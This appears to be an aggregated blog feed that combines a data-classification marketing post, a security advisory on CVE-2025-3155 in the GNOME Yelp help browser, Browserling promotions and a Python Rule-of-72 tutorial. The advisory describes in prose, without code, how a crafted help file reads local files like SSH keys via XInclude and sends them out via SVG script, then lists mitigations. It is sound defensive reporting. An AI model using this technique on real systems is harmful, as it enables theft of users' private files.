Discovery tells you what data you have. Classification tells you how to treat it.
Is it public? Internal? Confidential? Restricted? Classification assigns your data a business context and risk level so you can apply the right protection, retention, and sharing rules.
This is especially critical in industries governed by privacy laws like GDPR, DPDP Act, and HIPAA, where treating all data the same is both inefficient and non-compliant.
With classification in place, you can:
Together, discovery and classification form the bedrock of data governance. Think of them as a radar system and rulebook:
When integrated into broader data security workflows – like Zero Trust access control, insider threat detection, and consent management – they multiply the impact of every security investment.
You can’t secure what you can’t see. With clarity on your sensitive data’s location and classification, you can apply fine-tuned protections such as encryption, role-based access, and DLP—only where needed. That reduces attack surfaces and simplifies security operations.
Global data laws are demanding and constantly evolving. Discovery and classification help you prove accountability, map personal data flows, and respond to rights requests accurately and on time.
Storing ROT data is expensive and risky. Discovery helps you declutter, archive, or delete non-critical data while lowering infrastructure costs and improving data agility.
The longer a breach goes undetected, the more damage it does. By continuously discovering and classifying data, you spot anomalies and vulnerabilities early; well before they spiral into crises.
Only clean, well-classified data can fuel accurate analytics and AI. Whether it’s refining customer journeys or optimizing supply chains, data quality starts with discovery and classification.
In a world where data is constantly growing, moving, and evolving, the ability to discover and classify is a strategic necessity. These foundational capabilities empower organizations to go beyond reactive compliance and security, helping them build proactive, resilient, and intelligent data ecosystems.
Whether your goal is to stay ahead of regulatory demands, reduce operational risks, or unlock smarter insights, it all starts with knowing your data. Discovery and classification don’t just minimize exposure; they create clarity, control, and confidence.
Enterprises looking to take control of their data can rely on Seqrite’s Data Privacy solution, which delivers powerful discovery and classification capabilities to turn information into an advantage.
Yelp is the default help browser in GNOME-based Linux distributions, including widely used systems such as Ubuntu, Fedora and Debian etc. It is responsible for rendering help documentation written in the Mallard XML format and integrates tightly with the desktop environment via the ghelp:// URI scheme. This integration allows applications and users to open help topics directly using protocol links, making Yelp a core utility for accessing user guides and documentation.
A vulnerability was recently discovered in Yelp that allows it to process specially crafted help documents in unsafe ways. This flaw, identified as CVE-2025-3155, can be exploited to execute arbitrary scripts embedded within help files, potentially leading to the exposure of sensitive user data to external systems.
CVE-2025-3155 is a vulnerability in Yelp, the GNOME help browser, related to its handling of help documents written in the Mallard XML format.
An attacker can craft a malicious .page file that uses XInclude to embed the contents of arbitrary local files—such as /etc/passwd or private SSH keys—directly into the displayed help content. If the user opens this file in Yelp, the referenced file is read and rendered within the interface, leading to local file disclosure.
An attacker may also embed SVG elements containing JavaScript within the crafted help file. When processed by Yelp, these scripts can be executed as part of the rendering process, enabling the exfiltration of included file content to an external server. The vulnerability affects Yelp versions up to 42.1 and has been confirmed on GNOME-based distributions such as Ubuntu 22.04.
The exploitation of CVE-2025-3155 involves delivering a malicious Mallard .page help file to the victim and leveraging Yelp’s behaviour to access and potentially leak sensitive local files. The process can be broken down into the following steps:
The attacker creates a malicious .page file containing an XInclude directive to reference sensitive local files and embeds SVG-based JavaScript for exfiltration. This file is then hosted on a web page under the attacker’s control.
Placing the File on the Victim’s System
Through social engineering or a drive-by download technique, the attacker delivers the crafted file to a user-writable directory on the victim’s system.
The attacker leads the victim to a crafted ghelp:// link that references the previously downloaded malicious page file. When accessed, Yelp opens the file for processing.
When Yelp opens the page file, it processes the XInclude directive and reads content from the specified local files. In an attack scenario where the file contains embedded SVG scripting, the extracted data can be exfiltrated to an attacker-controlled server.
CVE-2025-3155 highlights a significant weakness in how user-facing applications like Yelp process local help content. This flaw has the potential to enable attackers to exfiltrate sensitive user files such as SSH private keys or password stores. In targeted environments, such as hospitality, entertainment, or enterprise Linux workstations, exploitation of this vulnerability could:
Evidence from recent cyber threat reports suggests this vulnerability has already been leveraged by threat groups in targeted industries.
To safeguard Linux systems and users against exploitation of this vulnerability, the following countermeasures are strongly recommended:
Update Yelp Immediately: Ensure Yelp is updated to version 42.2 or later, where the vulnerability is patched.
Restrict ghelp:// URI Usage: Avoid launching help files from untrusted sources or links. Consider limiting the exposure of ghelp:// handlers via URI sandboxing or policy enforcement.
Harden File Access Permissions: Limit read permissions for sensitive files like ~/.ssh/id_rsa and other secrets. Regularly audit user permissions and use encrypted key storage wherever possible.
Monitor Yelp Behaviour: Although monitoring is not a primary mitigation, security teams may choose to audit Yelp usage for post-exploitation indicators. Abnormal patterns—such as Yelp accessing sensitive files or initiating network connections—could signal an attempted abuse of the vulnerability. This should be used as part of broader endpoint visibility, not as a standalone defence.
Educate End Users: Inform users about the risks of opening help files from unknown sources and recognize spoofed support documentation. Implement awareness campaigns that treat .page files as potentially harmful.
By combining patch management with proactive monitoring and user education, organizations can mitigate the risks posed by CVE-2025-3155 and prevent it from being used as a stepping stone in larger attack chains.
CVE-2025-3155 demonstrates how functionality intended for local documentation rendering can become a vector for unintended data exposure. By leveraging features like XInclude and URI-based invocation, an attacker can craft a low-interaction exploitation chain capable of disclosing sensitive files and exfiltrating them without explicit user consent. This case underscores the importance of strict content handling in local applications and reinforces the need for timely updates and user vigilance against unfamiliar file types and protocol-driven links.
References:
https://gitlab.gnome.org/GNOME/yelp/-/issues/221
Authors:
Vinay Kumar
Adrip Mukherjee
At Browserling and Online Tools, we love sales.
We just created a new automated Sunday Sale.
Now each week on Sunday, we show a 50% discount offer to all users who visit our site.
Browserling is an online service that lets you test how other websites look and work in different web browsers, like Chrome, Firefox, or Safari, without needing to install them. It runs real browsers on real machines and streams them to your screen, kind of like remote desktop but focused on browsers. This helps web developers and regular users check for bugs, suspicious links, and weird stuff that happens in certain browsers. You just go to Browserling, pick a browser and version, and then enter the site you want to test. It’s quick, easy, and works from your browser with no downloads or installs.
Online Tools is a website that offers free, browser-based productivity tools for everyday tasks like editing text, converting files, editing images, working with code, and way more. It’s an all-in-one Digital Swiss Army Knife with 1500+ utilities, so you can find the exact tool you need without installing anything. Just open the site, use what you need, and get things done fast.
Browserling and Online Tools are used by millions of regular internet users, developers, designers, students, and even Fortune 100 companies. Browserling is handy for testing websites in different browsers without having to install them. Online Tools are used for simple tasks like resizing or converting images, or even fixing small file problems quickly without downloading any apps.
Buy a subscription now and see you next time!
Ever heard of the Rule of 72? It’s a classic finance shortcut that tells you how many years it takes for an investment to double at a given interest rate—without reaching for a calculator! Pretty much, if you want to understand when you are going to double your money, that are growing with 7% per year, then simply divide 72 by 7 and see the approximate answer. It works like that and it is approximately ok, for values between 5 and 10%.
For all other values, the formula looks like this:
ln(2) is approximately 0.693. Hence, it is 0.693 divided by ln(1+tiny percentage).
With Python the formula looks like this:
|
|
import math
def exact_doubling_time(rate_percent): rate_decimal = rate_percent / 100.0 return math.log(2)/math.log(1+rate_decimal) |
If you want to see how exact the formula is, then a good comparison vs the exact value looks like this:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
|
def rule_of_72(rate_percent): return 72 / rate_percent
def rule_of_70(rate_percent): return 70 / rate_percent
def rule_of_69(rate_percent): return 69 / rate_percent
rate_ex = 8 approx_72 = rule_of_72(rate_ex) approx_70 = rule_of_70(rate_ex) approx_69 = rule_of_69(rate_ex) exact_val = exact_doubling_time(rate_ex)
print(f“Interest Rate: {rate_ex}%”) print(f“Rule of 72: {approx_72:.2f} years”) print(f“Rule of 70: {approx_70:.2f} years”) print(f“Rule of 69: {approx_69:.2f} years”) print(f“Exact: {exact_val:.3f} years”)
for r_percent in [1, 2, 5, 8, 10, 20]: exact_t = exact_doubling_time(r_percent) t72 = rule_of_72(r_percent) print(f“Rate: {r_percent}%\n” f” Exact = {exact_t:.3f} | Rule 72 = {t72:.3f} | Error = {100*(t72 – exact_t)/exact_t:.2f}%\n”) |
The execution of the code from above like this:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
|
Interest Rate: 8% Rule of 72: 9.00 years Rule of 70: 8.75 years Rule of 69: 8.62 years Exact: 9.006 years
Rate: 1% Exact = 69.661 | Rule 72 = 72.000 | Error = 3.36%
Rate: 2% Exact = 35.003 | Rule 72 = 36.000 | Error = 2.85%
Rate: 5% Exact = 14.207 | Rule 72 = 14.400 | Error = 1.36%
Rate: 8% Exact = 9.006 | Rule 72 = 9.000 | Error = –0.07%
Rate: 10% Exact = 7.273 | Rule 72 = 7.200 | Error = –1.00%
Rate: 20% Exact = 3.802 | Rule 72 = 3.600 | Error = –5.31% |
The YT video, explaining the code and is here:
https://www.youtube.com/watch?v=BURstTrQWkA
The GitHub code is here: https://github.com/Vitosh/Python_personal/tree/master/YouTube/023_Python-Rule-of-72
A nice picture from Polovrak Peak, Bulgaria
Enjoy!
Yesterday Online PNG Tools smashed through 6.46M Google clicks and today it’s smashed through 6.47M Google clicks! That’s 10,000 new clicks in a single day – the smash train keeps on rollin’!
Online PNG Tools offers a collection of easy-to-use web apps that help you work with PNG images right in your browser. It’s like a Swiss Army Knife for anything PNG-related. On this site, you can create transparent PNGs, edit icons, clean up logos, crop stamps, change colors of signatures, and customize stickers – there’s a tool for it all. The best part is that you don’t need to install anything or be a graphic designer. All tools are made for regular people who just want to get stuff done with their images. No sign-ups, no downloads – just quick and easy PNG editing tools.
Online PNG Tools were created by me and my team at Browserling. We’ve build simple, browser-based tools that anyone can use without needing to download or install anything. Along with PNG tools, we also work on cross-browser testing to help developers make sure their websites work great on all web browsers. Our mission is to make online tools that are fast, easy to use, and that are helpful for everyday tasks like editing icons, logos, and signatures.
Online PNG Tools and Browserling are used by everyone – from casual users to professionals and even Fortune 100 companies. Casual users often use them to make memes, edit profile pictures, or remove backgrounds. Professionals use them to clean up logos, design icons, or prepare images for websites and apps.
Smash too and see you tomorrow at 6.48M clicks! 📈
PS. Use coupon code SMASHLING for a 30% discount on these tools at onlinePNGtools.com/pricing. 💸